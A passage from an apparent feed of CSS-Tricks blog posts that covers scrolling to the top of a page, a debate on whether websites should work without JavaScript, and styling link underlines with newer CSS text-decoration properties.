  <body>
    <!-- the entire document -->
    <a href="#top">Jump to top of page</a>
  </body>
</html>

But we've got a few options here.

If you want it to smooth scroll up to the top, you can do that in CSS if you like:

html { scroll-behavior: smooth; }

Note that placing a property on the HTML element like that is all-encompassing behavior you don't have much control over.
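If that's a concern, one option is to scope the property to a specific scroll container instead. Here's a minimal sketch, where .scroll-panel is a hypothetical class for a scrollable element:

/* Only this (hypothetical) scrollable panel scrolls smoothly */
.scroll-panel {
  overflow-y: auto;
  scroll-behavior: smooth;
}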

In this case, we aren't linking to a focusable element either, which means that focus won't change. That's probably important, so this would be better:

<html>
  <body>
    <a id="top"></a>
    <!-- the entire document -->
    <a href="#top">Jump to top of page</a>
  </body>
</html>

It's better because the focus will move to that anchor tag, which is good for people using the keyboard or assistive technology.

These require clicks though. You might need to trigger scrolling within JavaScript, in which case:

window.scrollTo(0, 0);

...is a sure bet to scroll the window back to the top (elements have their own scrollTo() method, too). The scrolling behavior is determined by CSS as well, but if you aren't setting it there, you can force the smoothness in JavaScript:

window.scroll({ top: 0, left: 0, behavior: 'smooth' });

For a more complete story about smooth scrolling, we have a page for that.

The post Need to scroll to the top of the page? appeared first on CSS-Tricks.

Should a website work without JavaScript?

Css Tricks - Mon, 09/02/2019 - 4:07am

The JS Party podcast just had a fun episode where they debated this classic question by splitting into two groups of two. Each group was assigned a "side" of this debate, and then let loose to debate it. I don't think anybody can listen to a show like this and not be totally flooded with thoughts! Here are mine.

  • This is one of those holy war arguments that has raged on for years. Perhaps that’s because people are seeking an answer that applies to the entire web, and the web is too big to pin this broad of an answer to.
  • The question itself is worth a look. Why are we talking about hamstringing our sites in this particular way? Should our websites work without HTML? Should our websites work without databases? Perhaps we focus on JavaScript the most because JavaScript has become the largest bottleneck of web performance (even more so than the network!) and we experience failed JavaScript more than any other type of web failure (except, perhaps, entire sites not loading) (or icon fonts, jeez).
  • I enjoyed all the stumbling around the terminology of "web apps" and "web sites" (web things!). This is such a weird one. It's so easy to picture the difference in your head: it's like Facebook versus a blog! But when you start trying to define it exactly, it gets really murky really quickly and the distinction loses any value, if it had any to start with. Here's more on that.
  • Accessibility is certainly involved in all conversation about the web, but it probably can't be broadly applied here. There is a notion that assistive tech doesn’t run JavaScript — so a site that requires JavaScript to use it is a 100% fail for those users. Best I know, that’s entirely not the case anymore. We can debate to death the role of JavaScript in accessibility problems, but just because a particular site requires JavaScript to run doesn't by itself render the site inaccessible.
  • It’s easy enough to flip off JavaScript, browse around the web, find broken things, and chinflip them for this apparent failure. The failure being that this site, or a feature on the site, could have been architected to work without JavaScript. Rule of least power. This is tricky. It’s easy not to care about a person who has intentionally disabled a part of their web browser and still wants everything to work. I straight up don’t care about that. But the resiliency part is more interesting. If you do build a part of a site to work without JavaScript, it will work both before and after the JavaScript executes, which is pretty great.
  • The concept of building functional content and features without JavaScript and enhancing the experience with JavaScript is called progressive enhancement. I'm both a fan and careful not to insist that everything on earth is always to be built that way (see top bullet point). There are situations where progressive enhancement both increases and reduces technical debt. The only wide brush I'd use here is to say that it's worth doing until the debt is too high.
  • There is an in-between moment with progressive enhancement. If a feature is functional without JavaScript, that means it's likely you are deferring the loading of that JavaScript for the performance benefit. But it does eventually need to be downloaded and executed. What happens during that time? There is a performance and UX cost there. Best case, it's negligible. Worst case, you break the feature during this in-between time.
  • I find it more interesting to debate this kind of thing on a site-by-site and feature-by-feature basis. Application holotypes might be an interesting way to scope it. They often turned to Slack as an example, which is a perfect choice. How would you build a 20-author movie review site? How would you architect a social and media-heavy site like Dribbble? How do you build dropdown navigation? What about a one-page brochure site where the client wants parallax? How about an airline app that needs a native mobile app as well? And of course, it makes you think about sites you work on yourself. Does CodePen run on the right set of technologies? Does CSS-Tricks?
  • If a site is "client-side rendered" (CSR), that means JavaScript is doing the data fetching and creating the DOM and all that. If we're talking about websites "working" or not with or without JavaScript, a site that is client-side rendered will 100% fail without JavaScript. It is sort of the opposite of "server-side rendered" (SSR), in which the document comes down as HTML right from the server. SSR is almost certainly faster for the first-load experience. CSR, typically, is faster for moving around the site after loading (think "single page app," or SPA).
  • It's not just SSR vs. CSR — there is a whole spectrum. It's more and more common to see sites try to take advantage of the best of both worlds. For example, Next/Nuxt/Gatsby, or Ember's fastboot.
  • Service workers are JavaScript. Web workers are JavaScript. Some of the fancy resilience and performance features of the web are powered by the same technology that causes the grief we debate about.

The post Should a website work without JavaScript? appeared first on CSS-Tricks.

Styling Links with Real Underlines

Css Tricks - Fri, 08/30/2019 - 4:31am

Before we come to how to style underlines, we should answer the question: should we underline?

In graphic design, underlines are generally seen as unsophisticated. There are nicer ways to draw emphasis, to establish hierarchy, and to demarcate titles.

That’s clear in this advice from Butterick’s "Practical Typography":

If you feel the urge to underline, use bold or italic instead. In special situations, like headings, you can also consider using all caps, small caps, or changing the point size. Not convinced? I invite you to find a book, newspaper, or magazine that underlines text. That look is mostly associated with supermarket tabloids.

But the web is different. Hyperlinks are the defining feature of the internet; and from the internet’s inception, they have been underlined. It’s a universally understood convention. The meaning is crystal clear — an underline means a link.

However, plenty of popular websites have ditched underlines: The New York Times, New York Magazine, The Washington Post, Bloomberg, Amazon, Apple, GitHub, Twitter, Wikipedia. When Google removed underlines from its search results page in 2014, lead designer Jon Wiley argued that it created a cleaner look. Notably, though, the majority of these sites have kept slight variances on the traditional lurid blue color (#0000EE) that's been the browser default since the beginning of the web. While this provides a visual cue for the majority of users, it may not be enough to pass WCAG accessibility compliance.

Color is not used as the only visual means of conveying information, indicating an action, prompting a response, or distinguishing a visual element.
WCAG 2.1

WCAG does not strictly mandate using underlines for links, but it does recommend them. Color-blind users need to be able to discern a link. You could differentiate links in other ways, such as with a bold font-weight. Or you could keep this long-established visual affordance. But if we're going to use underlines, we want them to look nice. Marcin Wichary, a designer at Medium, described the perfect underline as:

[...] visible, but unobtrusive — allowing people to realize what’s clickable, but without drawing too much attention to itself. It should be positioned at just the right distance from the text, sitting comfortably behind it for when descenders want to occupy the same space.

Achieving this has traditionally required CSS tricks.

The hacks we’ve had

This is one trick all developers will be familiar with: border-bottom. By emulating an underline using border-bottom, we gain control over color and thickness. These pseudo-underlines have one problem: an overly large distance from the text. They are underneath the descenders of the letters. You could potentially solve this issue by using line-height, but that comes with its own issues. A similar technique utilises box-shadow. Marcin Wichary pioneered the most sophisticated technique, using background-image to simulate an underline. They were useful hacks but are thankfully no longer needed.
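For reference, the box-shadow flavor of those hacks looked roughly like this; a sketch for illustration, not production code:

/* Pseudo-underline: a solid shadow offset just below the text box */
a {
  text-decoration: none;
  box-shadow: 0 0.0625em 0 0 currentColor;
}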

Styling real underlines

Finally we can demarcate links without sacrificing style thanks to two new CSS properties.

  • text-underline-offset controls the position of the underline.
  • text-decoration-thickness controls the thickness of underlines, as well as overlines, and line-throughs.

According to the WebKit blog:

You can also specify from-font to both of these properties which will pull the relevant metric from the used font file itself.
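Support for these values was still settling at the time of writing, so treat this as a sketch of how from-font might be layered over fixed fallbacks:

a {
  /* Fixed values first, as a fallback */
  text-decoration-thickness: .0625em;
  text-underline-offset: .125em;
  /* Then defer to the font's own metrics where supported */
  text-decoration-thickness: from-font;
  text-underline-offset: from-font;
}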

UX agency Clearleft make bold use of (pseudo) underlines, calling clear attention to links with colorful styling. Here’s one example of a faux underline:

a {
  text-decoration: none;
  border-bottom: #EA215A 0.125em solid;
}

Notice that this fake underline is clearly below the descender of the letter "y":

Here’s the same paragraph, using DevTools to apply the same styling to a real underline using the new CSS properties:

a {
  text-decoration-color: #EA215A;
  text-decoration-thickness: .125em;
  text-underline-offset: 1.5px;
}

You’ll notice I’m using the em unit in my example code. The spec strongly encourages using it rather than pixels so that the thickness scales with the font.

These properties have already shipped in Safari and are coming in Firefox 70.

With the move to Chromium for Microsoft’s Edge browser, we will finally have cross browser support for the text-decoration-style property, which offers the options: solid (the default), double, dotted, dashed, and wavy. When combined, these new properties open up a whole range of possibilities.
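For example, here's a sketch of one such combination; the color and sizes are arbitrary choices of mine:

/* A wavy, tinted underline nudged below the descenders */
a {
  text-decoration-line: underline;
  text-decoration-style: wavy;
  text-decoration-color: #EA215A;
  text-underline-offset: .125em;
}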

Perhaps the biggest upgrade for underlines on the web, however, has come without developers needing to do anything. In the bad old days, descenders were unceremoniously sliced through by underlines, which was far from elegant. Developers used to hack around this shortcoming by applying a text-shadow that matched the background color. text-decoration-skip-ink brought a better way to make space for descenders.

The default value of auto (left) and a value of none (right)

Handily, it’s set as the new default value for underlines; meaning the look of underlines has improved while most web developers remain unaware that this property exists. Should you want an underline to cross over glyphs, you can set this property to none.

The post Styling Links with Real Underlines appeared first on CSS-Tricks.
